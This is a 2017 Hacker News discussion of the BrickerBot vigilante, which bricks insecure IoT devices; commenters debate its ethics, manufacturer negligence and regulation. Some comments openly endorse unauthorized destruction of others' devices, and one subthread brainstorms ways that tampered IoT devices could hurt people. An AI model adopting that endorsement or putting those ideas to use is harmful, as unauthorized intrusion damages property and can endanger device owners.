Hacker News new | past | comments | ask | show | jobs | submit login
A vigilante trying to improve IoT security (gizmodo.com)
303 points by jgrahamc on April 26, 2017 | hide | past | favorite | 231 comments



It's all fine and well until one of those improperly configured devices are a medical device or something critical. Yes I understand that's part of the problem, but proving a point with risk isn't the right answer either. Every Dialysis machine i've seen runs windows xp, which any security professional will tell you is game over, but given the market hasn't provided an alternative, it's becomes a necessity to figure out how to protect these improperly updated / configured / designed devices.

Fandom of actions that impact others in a negative way is bad, and one day someone will do something they feel is right that impacts you and you'll say.. well that's not fair.


I'm the author of the Gizmodo post. Having covered IoT hacks for a few years, it's obvious that drastic measures would be necessary to convince manufacturers to build more secure products. While I'm not necessarily endorsing this hacker's methods, I do salute his taking a stand. It might land him in jail. But still, the mission is worthwhile.


He's providing an economic benefit to society - internalizing (to consumers) the externality of IOT botnets. It's now on the consumers to further internalize to cost to manufacturers through product selection, class action, or both.


Not necessarily. If a consumer's device is bricked within the (usually 1-year) warranty period, then they're able to send it back to the manufacturer for a replacement, which pushes the cost right back to the manufacturer.

Also, if the device is bricked very quickly after buying it and installing it, the consumer will very likely simply return it to the retailer as defective, which again pushes costs back to the manufacturer.


I think that's actually the only solution to the IoT security problem: more people regularly scanning for and bricking these devices, until the return rates make it unprofitable to sell broken devices in the first place


In that case, I think for the vigilantes it's absolutely critical that they figure out how to brick these devices as quickly as possible when they come on the market, because if they're targeting devices that are a couple years old now, that means many consumers will be past their warranty period and may not be able to return them.


I was on the fence about this vigilante bricking until reading your comment. Pushing the cost back to the manufacturer in this case should make considerable difference since these are low-cost devices and therefore the cost to the manufacturer of each return will probably cancel the profit of the last ten sold. Those proportions will become hard to ignore.


How does your opinion change with Phishing attacks? I'm going to steal funds from businesses by phishing vulnerable people, because If I don't capitalize on it, then people won't understand the costs / risks.


These are intentionally-defective products bought by apathetic consumers. They've already been compromised in mass with lots of damage done. Destroying dangerous, defective products isn't the same as conning innocent people out of their money.

That's what the IoT vendors did. ;)


The person bricking IoT's isn't getting money from that. If they did, I would hope they or you did, I would hope each of you would donate to charities.


You don't really know that for sure. That person could easily be shorting the shares of IoT device companies that they are targeting, hoping that articles like this one are written critical of the manufacturers.


They could be. But that question of could it be is clearly different from the person outright stealing money directly from victims, for whom it is much more likely they are a scam artist trying to rationalize their bad behavior.

By saying clearly different, I don't mean to minimize the actions of the vigilante. One of the chief characteristics of civil disobedience, for example, is to resolve that could it be question. By receiving the unjust punishment the dissident displays good faith with proponents and opponents. I don't yet see how pseudonymous hacktivism keeps that good faith with the public. And that seems to relegate it either be small scale, symbolic acts like this or large-scale grey hat stuff that brings lots of unwanted risks/cooptation/etc.


What they get is irrelevant, it's someone using their skill set to make others aware of a flaw. I would argue it's the exact same premise. I'm going to phish people & cause them a financial cost to teach them to be safe.


> What they get is irrelevant

It's actually the main relevant part of the analogy.

It goes to veracity.

There's a person who gave a public talk about manipulating Bitcoins with weak private keys in order to alert the owners that they were vulnerable. But he did it in a way that verified to the owner he hadn't in fact stolen the coins (moving small portions around or maybe signing with the key, I can't remember). He also mentioned in the public talk that the owners of those Bitcoins were totally freaked out by this, and most were never convinced that he was acting in good faith (which is probably a smart assumption on their part).

So the fact that he didn't steal the coins is completely relevant-- it's the very reason he could give a public talk on what is still grey area behavior.

Your hypothetical thief, on the other hand, is clearly mendacious. You have him claiming, "If I don't capitalize on it, then people won't understand the costs/risks." That is clearly false from my real-world example above, and if he tried to give a public talk about how his theft benefited society he'd be arrested.


You're probably talking about me. I actually screwed up when I was moving coins around, and ended up emptying someone's address out, however I put everything back within a few minutes. I haven't had anyone whose coins I touched accuse me of anything unseemly, but of course there are random posters on internet forums who talk shit.

Your point that I couldn't have given a public talk had I stolen the coins is completely correct. I still spoke with a lawyer about it ahead of time, though. :-P

There was another person, who was somewhat less scrupulous, who would simply steal the coins and watch for someone to complain in public about it, then offer to return them. They use a pseudonym and as far as I can tell have vanished.


Oh, hey! Glad to hear you talked to a lawyer beforehand.


So what's gained by bricking, disabling, or modifying devices, that couldn't be proven with a simple these devices are vulnerable announcement?


Bricked devices can't participate in a DDOS attack.


I am OK with this as well. If you put up a script on github and email an org, asking for help debugging and your script drops an ssh key, then daemonize a reverse tunnel running as that user to a VM you control, then I would blame companies and the maintainers of ssh for allowing this to work. If their board members are unaware of the risk, then shame on any human layers that hid these capabilities or were too inept to fix it. It is their fiduciary responsibility to their investors to take security and privacy seriously to protect their investments. Companies that are cavalier in this regard need not survive.


Probably it doesn't change, because those aren't at all analogous situations.


Engineering needs to stop being subordinate to anything but top management (if at all). An MBA can always outrank an engineer's decision and that is a big reason why we have crap devices out in the field.


Without labor laws to back something like this up, all it does is get engineers fired. Non-software engineering fields do have such laws, I believe. An MBA cannot make a civil engineer build a bridge that is unsafe because they want to save money. After all, it's the project engineer's signature on the final work. (Please correct me if I'm wrong.) On the other hand, a large proportion of startups are doing something illegal or unethical and the only recourse for the engineer there is to quit or be fired. In some egregious cases, that may be worth it. Mostly, it's not. That's how our labor system is set up. I've always said, if you want to kill someone, start a corporation. It's the easiest way to get have someone else do it for you and get away with it. Anything less than murder in business is not even a consideration (unless the business gets punished which it most likely won't be).


I am a structural EIT. Industry focus on safety is paramount. Seniority is very much respected so there are almost no young MBAs and they exist almost exclusively at the corporate level. Only a full engineer can legally stamp off on the final drawings and the accompanying calculations and I've never really seen a business type ever try to interfere in that.


Keyword: legally. Spftware is often built to the cheapest spec that'll sell. Even peacemaker are often carring vulnerabilities.


Aerospace regulates software and hardware. Software standard is DO-178B. Thanks to it, the systems get great quality assurance. A common thing that emerged from that are partitioning RTOS's that separate critical and untrustworthy stuff. They also usually have trusted boot. The cheapest CPU I saw supporting those was a Freescale one for $4 a piece in quantities of 100 units.

So, yeah, even in softwarw one can do as you suggest. Multiple times it's been done with things improving across the board. In DO-178B, an additional effect is an ecosystem of tooling, reusable components, and consultants sprang up to make each project a bit cheaper and less risky.


It's simply difficult to secure devices. It's hard the same way engineering is hard.

I know it's fashionable to blame the MBAs instead of blame ourselves, but at the end of it, we're the ones who write insecure code. And I don't think that if you give an engineer an extra week or two to focus on security that you'd end up with a measurably more secure device. Securing something is a different skillset from building it.

Pentests are probably the answer.


Secure against a dedicated attacker, yes. But telnet listening on port 23 and a conistent default admin password on all your devices is really not that hard to improve on (and that's the sort of device that BrickerBot is killing).


Perhaps. But someone thought it was a good idea to put up a telnet port 23 default-admin-password interface. The point is, if you give that person two weeks to focus on securing the product, I'm not sure they would realize it's a bad idea to do that. People who are bad at security don't realize they're bad at security. Which is why it's probably important to bring in an outside team to break the product.

Or to put it another way, if we're not proposing to bring in an outside team to conduct a pentest, what's the alternative?


I've done intentionally insecure things because I simply straight-up did not have time to do them correctly. Shared keys, shared password across an entire infra--lots of stupid things because my deadline wasn't moving and hours counted. The difference, of course, is that I retain control of my stuff and I'm not pushing things out to other people.

Pentests are, to be clear, great, and there are plenty of people who Dunning-Kruger their way through security decisions. But time is definitely a factor in this stuff.


I agree, but think of it this way: imagine a doctor arguing against washing their hands. The analogy is pretty apt. Washing your hands is as effective in reducing disease as pentests are at improving security. So why are we still seeking ways to justify to ourselves that we can do without pentests?

It just seems like pentests need to move from "nice" to "necessary." (Part of that is reducing their cost from $60k to $6k.)


The bigger problem with pentests is not the current cost but, as I see it, is that security is inherently and inescapably expensive somewhere in the chain, and that vendors have been getting a free lunch for too long. The viability of security analyses/pentests will go down if your goal is to reduce the cost by an order of magnitude because the people who are any good will find something better to do--and the consumer will still pay through all the bullshit externalities.

Security needs to cost to demand talent. The real solution to this problem, I think is that failure to secure needs to cost (whether in monetary or criminal terms) or it isn't relevant to business concerns.


I think the parent was arguing that this:

> security is inherently and inescapably expensive somewhere in the chain

...is the thing that needs to change. Presumably using more automation (e.g. employing more software like http://lcamtuf.coredump.cx/afl/), such that "pen-testing" shifts from being a labor cost to a capital cost.


Open telnet servers are a solved problem (taking the solution off the rack is a question of time and, effectively, the willingness to be negligent). The automation exists.

It's the hard stuff that is context- and environment-dependent to a degree that it resists automation.


It pen testing necessarily expensive? I wonder if we could train QA to use something like kali (or even just some network tools) to find 99% of vulnerabilities.


Sounds like a good opportunity for something analogous to UL certification, albeit for security.


"It's simply difficult to secure devices. It's hard the same way engineering is hard."

Put OpenBSD and OpenSSH on them with configuration explained in a good book on the subject. Write your apps in memory-safe language that validates external input. The End [for vast majority of attacks in IoT space]. It's not as hard as you detractors claim. They just don't care.


Indeed. It's not hard, it's just more expensive than not doing it at all. And since there is usually no incentive doing it, it is not being done, because not doing it saves money.


Exactly!


I don't disagree, but on the other hand, there's the question of what makes a "Good Engineer". There's plenty of fields where engineers (and other technical folk like architects or even, say, doctors) are certified by professional organizations. Those orgs can keep you from practicing your profession without their approval, and if you do something unethical they can pull your license to operate. The organizations also provide their membership with strong support to stand up to management against bad practices.

On the one hand, this certainly makes a lot of sense, especially these days with so many stories about terrible engineering (either just bad or as a result of unethical behavior) causing real harm.

On the other hand, it's precisely organizations like this (effectively guilds or unions) that tech "leaders" try to disrupt. They tend to be pretty conservative.


Is it that simple? Having veto over certain decisions might solve some vectors, but security isn't an item to check off before you release a product, it's an ongoing maintenance concern because it's living in an ever evolving ecosystem.

Being able to put your foot down doesn't allocate resources for security updates.


Of course the other way around most often just gives you devices in the field nobody buys.

In this, like most things, you need a balance. If you aren't commercially driven in some fundamental way you probably won't last long enough for any of this to make a difference.

Of course if you apply that the wrong way, you end up with devices that suck and/or harm users. This way leads to regulation typically, since Smiths invisible and myopic hand usually acts too slowly for people to be convinced it will get to the right place, if we just wait long enough.


> Smiths invisible and myopic hand

I'm intrigued by this phrase, could you explain it please?


https://en.m.wikipedia.org/wiki/Invisible_hand

Adam Smith used the phrase "invisible hand" to describe the way markets reward certain business ventures. The previous poster called the invisible hand "myopic" in reference to consumers being focused on cheap devices with features that immediately benefit themselves.


I mean by this that in practice markets perform a sort of local optimization algorithm that can take a long time to discover better local maxima.


I would argue, security needs to be a part of planning day 1 rather than looked at as a bolt on prior to involving upper management. It needs to be treated as a core functionality rather than an external concept. The biggest issue I see is we are patching and finding fixes for something that could easily be remedied if address before engineering takes place. Most firms i've worked with put it on the back burner or are stuck with the notion of i'm an engineer i'm smart so deal with it.


> I would argue, security needs to be a part of planning day 1 rather than looked at as a bolt on prior to involving upper management.

Nothing I said implied bolting anything on prior to involving upper management.

ANY decision at any time during the process can be overruled by any MBA. That needs to change.


On the other hand, if you let the engineers run the shop, you might end up with another Juicero... an exquisitely designed product with few customers.


Quite possible. Not sure why that should negate anything I said. It is quite obvious that products like the Juicero are easily developed with MBAs at the helm.

If engineers run the shop you might even end up with another Uber. And we all know what a disaster that is.

However, at some level, MBAs and engineering need to be on level terms. If there's a conflict it can be resolved by going higher up the chain and both sides have the opportunity to make their case.


Yes, no engineer has ever made a bad design or decision, ever.


That's totally besides the point.

The idea here is that no engineer would knowingly sign off on something bad.


A rather optimistic idea, I'd contend.


I concur, in fact, how many IT professionals make bad SECURITY decisions because they in fact are trained to build and maintain an working infrastructure first and foremost.


Which is a silly assertion


Nothing I said implies engineers don't make bad decisions. What I implied is even the GOOD decisions can be overruled by any MBA at any time.


Perfect is the enemy of good.


This captures the essence of the type of activism that I so dislike — an unaffected, third party (a person who doesn't use your bluetooth lightbulb) taking the job upon himself to tell you what level of security your lightbulb should employ... By breaking it.


We're not unaffected anymore. Mirai did a lot of damage to a lot of people. Very diffuse damage, sure, but a lot of damage.

Note we've had worms and such for decades now and most of them don't deliberately break things. It's generally far more profitable to exploit the resources than simply destroy them. Brickerbot almost certainly wouldn't be if we weren't all getting affected.


Then fix your lightbulb so that someone can't tell you how to handle your lightbulbs. If you can't reach that low bar then why are you even connecting to the internet? You are implicitly allowing your tools to be used for botnets which should be a crime in itself.


So you think the consumers should be punished for something you think the producers do wrong? Do you apply this to other products as well? Would it be ok to soak peoples cigarettes in water, break the motor of your neighbours high fuel consuming SUV or destroy the guns of people since these products can cause damage to other people?


If a certain brand of cigarettes is creating secondhand smoke that causes a significant number of bystanders to die of anaphylactic shock somehow, and the government refuses to force a recall, and the manufacturer doesn't care, and the smokers don't care because it doesn't affect them, then YES, it is morally correct to destroy these cigarettes illegally.


The problem is, I think, what choice do we have (we == rest of the world) when somebody's messed up camera starts spamming the entire Internet? And how much does cost the mirai botnet to everyone when some client rents it?

Best case scenario: users claim warranty and replace their devices something better

Worst case scenario: users need to buy new gear, they probably won't buy from that same manufacturer because last one died for no apparent reason. Really worst case scenario: users buy again the same cr*p and dies again, until they realize that brand is worthless and buy something a bit better. Doesn't seem so bad, if the alternative is having their machines taking down businesses and users...


Really worst-case scenario: Someone is killed or maimed due to bricked system.

FTFY


I was particularly thinking of baby monitors during an emergency. It was most important house-hold device I could think of in terms of harm. Maybe turn a freezer off on IoT fridge while people are on vacation then back on just before they return to make meat refreeze or something spoiled. Maybe turn off the power in household with IoT home automation and someone on life support of some kind.

Im only having a few possibilities come to mind that are life-threatening. Most are just annoying or financial drain. If we add painful, maybe make an epileptic's screen on SmartTV blink fast like the attack on the web site. Turn off people's alarm clock enough they get fired and loose health insurance before major operation. Im really having to stretch it here.


Alarm system with remote fire alarm capability. Those things are everywhere and if they don't work people could easily die.


That's a great one. Good catch.


Lights that turn off at night while someone is walking down stairs can result in death if that person is unfamiliar or disoriented enough to tumble.


That's clever. The threat of lighting was nicely illustrated on Christmas Vacation. Whole relationships ruined and stuff.

https://www.youtube.com/watch?v=rp8lwpvQEIM


The analogy would be, someone leaves their cigarettes or their gun out on the stoop all night, or their SUV on the street unlocked with the keys in the ignition. If they do that, something is going to happen to it eventually. Especially if they live on a street that actually spans the entire world, and whose entire length can be traversed in one second.

John J. Citizen should be thankful if the person who finds it only wants to deactivate it rather than use it to poison him / shoot him / run him over. No matter who finds it though, it's tough luck for that person; they're the owner of that item in name only, if they don't secure it.

Society has decided in some cases (in domains well-understood by legislators, unlike IoT) that the person doesn't deserve to keep that item if they don't secure it. Example: "Improper storage of a firearm" or the like, is literally a crime in many jurisdictions and can result in losing your gun license. Creating a burden on or a danger to society through your neglect has in that case been affirmed to be unacceptable. The law will catch up with this too, I hope.


> Would it be ok to soak peoples cigarettes in water,...

How about in arsenic? The Internet of Things is mostly insecure trash that will only be fixed by throwing it away. The manufacturers know this, and simply don't care.



https://www.theguardian.com/technology/2016/oct/26/ddos-atta...

Very few people that use the internet were unaffected by shitty IoT security. And that seems like it was just the start of it's capabilities. Something needs to be done to destroy these cyber weapons. If your stupid light bulb is recruited into a cyber weapon, then it should be prevented from harming others.


I don't see this as activism per se. I see this as similar to a virus or bacterium coming into existence, forcing us toward better hygiene practices. You don't blame a virus or bacteria for existing; it's just sort of... there, part of the ecosystem. Instead, you blame things for being vulnerable to it and therefore spreading it. You try to kill it not by eliminating its "source", but by eliminating the spread.

Right now, we're beginning to treat DDoSes in that "infectious agent"/"your responsibility if you don't act to protect yourself" way. So many people do them, so often and so easily, that "shutting down the botters" one-by-one will never make DDoSes go away. So we have to just figure out how to deal with them. (Which will, coincidentally, make DDoSes actually go away, if everyone ends up immune to them such that it's no longer useful to do one.)

But, annoyingly, we still handle bots programmed to scan for and exploit software vulnerabilities (worms, ransomware, what-have-you) as only intentional malicious action on the part of their original author, to be solved by catching the author. (Not that you can't catch the author—but that won't stop a worm, and especially won't stop someone else from just slightly-modifying and then re-releasing the worm.) We haven't bothered nearly at all with the "how do we make software vulnerabilities, as a class, less exploitable" part of the equation.

Personally, I'm hoping that this decade sees "A-Life" computer worms, that self-modify using (machine-readable?) 0days they discover by spidering the web from their infected hosts. Computers would be being attacked with novel exploits, even with no new malware authors to do the attacking! Then we'd really have to treat vulnerabilities as a fact of life to secure around, rather than something we can stop by just stopping people from bothering to exploit them.


If I created a virus to punish people for failing to wash their hands regularly, and instead of giving them diarrhea it started killing people, I should absolutely get the blame for creating it. Even if it doesn't kill anyone I should still be held accountable.

Yes, this a rotten situation, and I sympathize with the motivation. No, I don't think we should blithely disregard the fact that the worm is likely causing genuine harm and that it was in fact created to cause harm.


I didn't mean that someone is not "to blame"; more just that a framing which even brings up who's "to blame" vastly overstates the "use" of punishing humans in defending oneself against this problem. Indeed, even if we catch "cyberterrorists" at a constant rate, this problem will only get worse: there will be more people; each person will have more and more programmable automation available to them, more and more easily; and people will grow more proficient with technology earlier and earlier in their lives (i.e. long before they've built up any sort of idea of ethics.)

Right now we have script-kiddy teenagers; Real Soon Now there won't be much reason to expect your average 5-year-old with a Youtube account, won't be able to slap together something like a ransomware worm from readily-available components, that will spread itself a billionfold. And, amongst 7 billion people and growing, there's going to be a lot of kids thinking that that sounds like a fun time.

The only thing to really stop this from being the world we live in, is making worms irrelevant.

(And what we do in the short term, about this case? Honestly, I haven't bothered to think about it. Too "identity politics.")


Is it an unaffected third party, when your unsecured lightbulb is participating in a DoS that knocks out some service he's relying on?


I'll choose a boogeyman you can perhaps appreciate: You bluetooth lightbulb is enabling pedophiles with anonymity, and you may take the fall when you're mistaken as the source of the requests. (You can swap out the boogeyman with terrorists, spammers, credit card thiefs, etc)


There's no such thing as an unaffected third party in a tragedy of the commons situation, which this is.


How is anyone unaffected when IoT devices with bad security break the net?


Did you not have any input into this headline? It is a clear endorsement.


My editor thought it might be too extreme, but I was sure that careful readers would latch on to the tongue-in-cheek intentions. Maybe I was wrong. I still stand by the statement.


I think the headline reads as personal, and therefore a lighter endorsement than something like "This Hacker is Our new Hero" or "This Hacker is a Hero".


For those confused by this comment, the actual title of the piece is: "This Hacker Is My New Hero".


What would your perspective be if I took a stance to secure your vehicle, or the power company, or any myriad of others simply because I chose to?

What do you do when I change my logic to, well this is a ZERO DAY exploit, but you need to be patched, without understanding the complexities of your device or network. Which we all know QA takes a while because of variables. Look at any microsoft patch for evidence of that. Your argument makes it seem like if I decide to weaponize the Shadow Brokers toolkit to lockdown and secure networks around the globe, i'm ok because my intentions are good and manufacturers should have secure code without 0 days. What happens when a proprietary driver or component fails because of a change made to the kernel or the way it handles driver functionality? Now I've broken / disabled something because I didn't know the intricacies and instead chose to do what I thought was right.

"No good deed goes unpunished"


> What do you do when I change my logic to, well this is a ZERO DAY exploit, but you need to be patched, without understanding the complexities of your device or network.

I'd say you are changing topics. The topic at hand is about devices that are designed to be insecure, because the involved parties just don't care. The manufacturer KNOWS yet doesn't care because the issue doesn't cause him any harm, and the user just doesn't know.

We are talking about devices that willingly expose themselves to the internet (oftentimes without any valid reason to), that are all factory-setup with the same credentials (and no must-change on first use policy), etc.. This is just malpractice, not 0-day vulnerabilities.


Ok, lets switch this around. You just rented your new apartment, they didn't change the locks from previous tenant. Now, by default everyone knows you should change locks to include the owner, manager of property, and renter. I, the previous tenant decided to stroll by the house one day, I realize that the doors are still easily unlocked by my key, so I walk in and poke around. Realizing that this is a security risk, so following your logic, it's completely sane for me to destroy the house and prove that it's a risk. Before you say, that's different, MFG will replace a device, i'm going to argue ok sure, they'll replace it, by that same virtue isn't that what insurance is for? They'll replace the property.

Bottom line, vigilantism has a cost and picking and choosing morality of ideals based on your sole opinion is neither appropriate or legal. laws exist for a reason.


A bit like my neighbor's door is wide open. Some teenagers are taking over it.

Instead of just close/lock the door for my neighbor or call the cop, I use a bulldozer to level the house to the ground. (zero out the flash.)

In theory, the "vigilante" can offer his service to device manufacturer to help remotely clean/update the devices instead of just simply wiping them off the net.


>Instead of just close/lock the door for my neighbor or call the cop,

This is where your analogy breaks. Who is your neighbor on the internet? The most logical answer I have is "Everyone with a public IP".

Next, who is the internet police? Sorry folks, there isn't one. If my neighbors house is open, I would call the cops for two reasons. First I don't want to see their stuff damaged. But also, it creates a public nuisance. Some variant of criminals (say drug users or stupid teens) could take up residence in their house, possibly even burning it down, which would make it a direct threat to me.

And that's the problem with our current internet police. They will gladly try to arrest you for breaking into someones house. But they will not bust the 100,000 houses that leave their front door open inviting crime into the neighborhood.


It does say the bot tries to secure the device and then resorts to bricking it if it can't. Not condoning the janitors actions but at least bricking isn't his first action.


The point is how do you know the vigilante's fix won't have adverse side effects?

EDIT* I agree with the bulldozer analogy.


> The point is how do you know the vigilante's fix won't have adverse side effects?

While you have raised some valid issues, this is not one of them. Having an unsecured device on the internet has some very definite adverse side-effects.


So does taking a vigilante approach to addressing these devices. It's no different than saying, there is crime in the inner city and It's my duty to handle it.


unfortunately, we know from past experience that a certain percentage of the manufacturers would attempt to sue anyone offering such a service into silence, or even attempt to have him prosecuted for a crime.


Just FYI you have a small mistake here: "So why did the Janit0r result to destruction". Should be "resort" I think.


Fixed. I will now install a dead rat under our copy editor's desk...


I find the arguments for "taking a stand" quite weak. Normally with subcultures that break the law or in other ways inconvenience people the moral argument is that you're doing something that isn't available to you (often as a group) and your actions themselves are meaningful (often because it makes it available to you).

I don't really see in this case how they (or mostly anyone) is unable to improve IoT (or general) security through other means or that the consequences of the actions themselves are any different from other forms of attacks on software (like credit card fraud, denial of service or ransomware).

The arguments from the "hacker" gets especially weak when they conclude that consequences of breaking IoT devices is worthwhile, but the consequences of IoT devices breaking the Internet doesn't have the same effects. Even though you could argue that it's far harder for most people to influence overall Internet security than IoT security and therefor the moral arguments for breaking the Internet as a way of improving it should be slightly easier to make.


"I don't really see in this case how they (or mostly anyone) is unable to improve IoT (or general) security through other means"

Really? How about you show me the evidence that people are... through "other means"... improving IOT security of these devices enough that DDOS isn't a big problem any more. I'd love to hear what you've done to convince all the vendors to focus on secure devices instead of profit when targeting markets that will deliver profit regardless of security. Most of us in INFOSEC haven't been able to convince much past a subset of software and hardware developers to focus on improving security.

The only time vendors ever delivered secure or safe solutions was when sound regulations were forced on them with a requirement they were followed before a purchase was made. That was TCSEC and DO-178B respectively.


That's true.

Altough i wonder: why didn't someone with deep security expertise, maybe ARM with it's mbed,created something developers can't harm, and on the other hand, issue a product label saying:"this is protected by our stack..." ?

I could see that be attractive to some b2b buyers, attracting devs, further strengthening the value of said label , increasing marketshare and reducing costs, and creating a positive feedback.


They did. It's mostly bs, though, since they cut corners too or cant impact the software lifecycle enough. Few people trust those labels. It could still be done, though, in a way along lines of Underwriter Laboratories and Consumer Reports with private evaluations.


Shouldn't the vigilantes try to DDOS the IoT vendor websites with their own devices (poetic justice) instead of what the bricker guy is doing? That way it seems the message he's sending would be as direct and unambiguous as it gets.


Attacks on the vendors are another good option if there's a low number of vendors. The DDOS idea has a weakness where they might barely be effective if sold through 3rd-party stores and ads.


[flagged]


"I've made my argument."

You didn't make an argument. You made a false claim that there were other methods that work and/or an implication that there wasn't much effort on doing that. All kinds of people have spent decades doing that. They get ignored.

"Why is it at all relevant what I've done and especially since when you don't say what you've done?"

"I haven't seen much convincing being done."

Programmers, support people, architects, tech managers, security experts, and so on have failed to do what you suggested because of greed and apathy of manufacturers. They write about it all the time on blogs, esp basic QA. They write about it here, too. I asked what you had done since you might have seen people successful at convincing greedy, hardware manufacturers at doing security at a loss. We obviously haven't.

""INFOSEC" (all caps of course because we want to be cool like the military)"

People in the military invented computer security. They taught me. Don't get excited because they called it "COMPUSEC" to differentiate between it and "COMSEC." CompSci and business called it information security w/ INFOSEC being a short-hand. Later, many in business started calling it IT Security or ITSEC. It's a business term that people from high-security, regulated backgrounds, some civilians, and military all use these days. We speak differently to laypersons in management or policy-making vs how we talk to HN techies. Nice try at trolling, red herring, though.

"Yes, you're still not making an argument why these actions would in any way would be a effective way to regulation."

I just told you regulations on information security were passed that worked and led to secure devices hitting the market. It happened twice at least. Obviously, that means there's a good chance regulating in a similar way with modern knowledge would do the same thing again. Meanwhile, nobody is doing anything at any level, you can't convince businesses to do anything in general case, and so a vigilante breaching defective, damaging stuff might be only progress we can get in meanwhile. Reduces risk and decreases demand for garbage products. Vendors might get message like Microsoft did leading to their 180 in security.


> You didn't make an argument.

I did make an argument, you just missed it. In most subcultures the thing your doing is the goal, therefor the actions themselves are meaningful (at least according to the participant). Since this isn't the case here, but more of a "the ends justify the means" situation, you have to argue that it actually does. The point isn't that there are other ways, which you incorrectly choose to focus on, but that you have to justify how these actions are appropriate both in themselves and relative to other actions.

> You made a false claim that there were other methods that work and/or an implication that there wasn't much effort on doing that.

As far as I know there isn't much effort going on. This is of course subjective, yet you haven't provided a real example of what you think is a substantial effort that should have lead to results.

> Programmers, support people, architects, tech managers, security experts, and so on have failed to do what you suggested because of greed and apathy of manufacturers.

Plenty of manufacturers make secure or at least not obviously insecure devices.

> They write about it all the time on blogs, esp basic QA. They write about it here, too.

The embedded ecosystem, especially in other countries, aren't going to see those blogs nor be able to act on it. They aren't ignored so much as not considered.

> People in the military invented computer security. They taught me.

I bet I have more military experience than you. The military operates in a different environment and different considerations than civilian infrastructure or products. Most civilian security researcher don't have formal training, yet frequently use terms like OPSEC without actually having an understanding what it means. Because if they did they would know that it to a large degree isn't transferable.

> Meanwhile, nobody is doing anything at any level, you can't convince businesses to do anything in general case, and so a vigilante breaching defective, damaging stuff might be only progress we can get in meanwhile. Reduces risk and decreases demand for garbage products. Vendors might get message like Microsoft did leading to their 180 in security.

This is just your opinion. If this how you do security work I'm not surprised you feel ignored.

The thing is I do have a number of suggestions on "other ways" to improve and/or promote IoT security. I see no point whatsoever mentioning them here though.


Connecting critical life support systems to the internet, and not having any contingency for an outage, sounds a lot like malpractice. Hospitals have fail-safes, and if they don't it's a far larger problem than using an insecure IOT device.


"It's all fine and well until one of those improperly configured devices are a medical device or something critical. "

It would be their fault. High-assurance industry has been telling SCADA and medical industry to get their shit together for a long time. This included pentests showing it could all be destroyed. They even have people at conferences talking about it with products or basic advice to deal with it.

The reason it's all still vulnerable is that they... don't... care. They turn whatever small amounts of money the security would've cost into profit. I mean, in some cases we're talking about remote monitoring that operates one way that could be done with a data diode for nearly impenetrable security. Cheap as hell if you homebrew it on cheap, embedded boxes. Likewise for FOSS VPN if two-way is required. Instead, costly system connected to wide open Internet to save a few hundred dollars. They just don't care.

So, you have to make them care. The customers don't as much since they often don't know better. Those that do are apathetic since it will be someone else's problem. That's best moment for regulation to step in to force a solution. There's no regulation, though. Court's seem unreliable on this but still some hope there. So, your options are waiting for them to hit you, paying exhorbitant costs for DDOS mitigation due to problems others are creating (i.e. externalizing), or maybe a criminal just smashes the insecure devices until people stop buying them or manufacturers start securing them. So, I like what's going given nothing else is reducing risk as effectively.


I've brought this up to others, how would you feel if someone decided to brick / modify your car without you knowing? What would you do if that fix backfired and caused damage, hard locked the controls on your car, or worse, simply shut it off at the wrong time? We absolutely need to fix these issues, the governments of the world need to enforce standards on products, but vigilantism no matter how much you may agree with, has to be treated the same across the line.


Your counter and metaphor doesnt really apply here. Let's look at why:

1. A car is a necessity that cost a ton to replace. An internet-connected camera or TV isnt. They could just as easily not buy an Internet-enabled appliance.

2. These devices are being used as weapons when people leave them around insecure. Leaving loaded guns lying around is a bit closer but minus the lethality.

3. With cars, we have efforts on safety and security at user side, manufacturer side, and the law. There's no effort to buy secure IoT by these users, to do even minimum protections at manufacturing, or pass laws putting liability on users or manufacturers where it should be. Now, it's more like a car with defective parts that make it hit other cars. A city's worth are affected with nobody taking action but people are told armored cars are available for a fortune.

So, these comparisons to highly damaging thefts of legit goods on innocent people are nonsense. There's defective products damaging innocent people. Nobody with power to prevent or punish it legitimately is doing anything. Im happy that a vigilante is reducing risk to Internet hosts plus putti g cost on those responsible for that risk.


Whether the car is hijacked to carry out attacks, or bricked by a vigilante trying to prevent another attack, I'd be pissed. But the blame lies squarely on the manufacturer who decided "meh, securing our devices against attack sounds expensive".


I think the problem is as often not about careing, and being unaware of anything outside their little subsystem.

You used to have what was essentially airgapped and self contained.

But then feature x needed an ongoing net connection, and it happens to run on the same soc as feature y that talk to the can bus, and boom.

Neither of the teams responsible for the features considers that something can jump from x to y, almost like an illness jumps between species.

Damn it, the other day HN linked to an article on how VMs sharing hardware could talk to each other using the CPU cache.


> VMs sharing hardware could talk to each other using the CPU cache

That sounds similar to a paper I read ~20 years ago that described a way to move data from a high privilege process, bypassing mandatory access control (>= TCSEC B), using page faults as a covert channel.

> it happens to run on the same soc as feature y that talk to the can bus

I wonder how many people will have to die to teach car manufacturers the lesson that there shouldn't be any electrical connection at all from the internet to the breaks.


Yep. The TCSEC had covert channel analysis as a requirement. Actually, two of the products (GEMSOS, STOP OS) certified at A1 can still be OEM licensed today in some form with a third (SNS Server) only sold to defense sector. They have plenty of competition, too, in MILS space. Solutions exist.


> But then feature x needed an ongoing net connection, and it happens to run on the same soc as feature y that talk to the can bus, and boom.

So then the question becomes: How are we going to educate engineers about this class of problems?


I think the first step is integrating secure design practices into curriculum. I was surprised to see how little emphasis was put in in both Traditional CS and Engineering courses at the universities I work with.


It's not the engineers, it's our managers.


>how would you feel if

Feelings are irrelevant.

Some vigilantes hack that said "Turn the car off at 10mph or less" is a far better outcome than the attackers option of "Press the gas and turn the wheel left as hard as you can at 100mph".


> Feelings are irrelevant.

Thank you. I am tired of these so-called arguments that start with "how would you feel if". If we're going by my feelings, you're all in deep trouble.


Can a case be made that the Insurance companies can make this problem less severe? I.e. to deny insurance to unaudited companies or charge a lot more if they refuse.


Stoplights are often installed after {n} number of people die at an intersection to justify the cost. Is that cool?

Regulations are put on companies after their freedom of choice; when abused, starts harming people. I think IoT is a perfect example of this. Today the manufactures have a great deal of freedom. Their lack of self regulation will require others to step in and regulate them.

On the matter of vigilantes: This is a complicated topic, but I support them doing this, even if it harms myself or someone I care about. If this problem is not stopped sooner than later, it will explode into a much bigger economic and/or societal issue that will be difficult to contain. I have warned the people I care about already.

The current state of IoT is a complete lack of responsibility. I would even support someone bricking every piece of machinery they can, including cars, heavy equipment, power plants and anything else that was built without proper engineering.


I don't think the connection will ever be direct enough for the masses to care, there will never been an equivalent of dead bodies hanging out of car wreckage at an intersection.

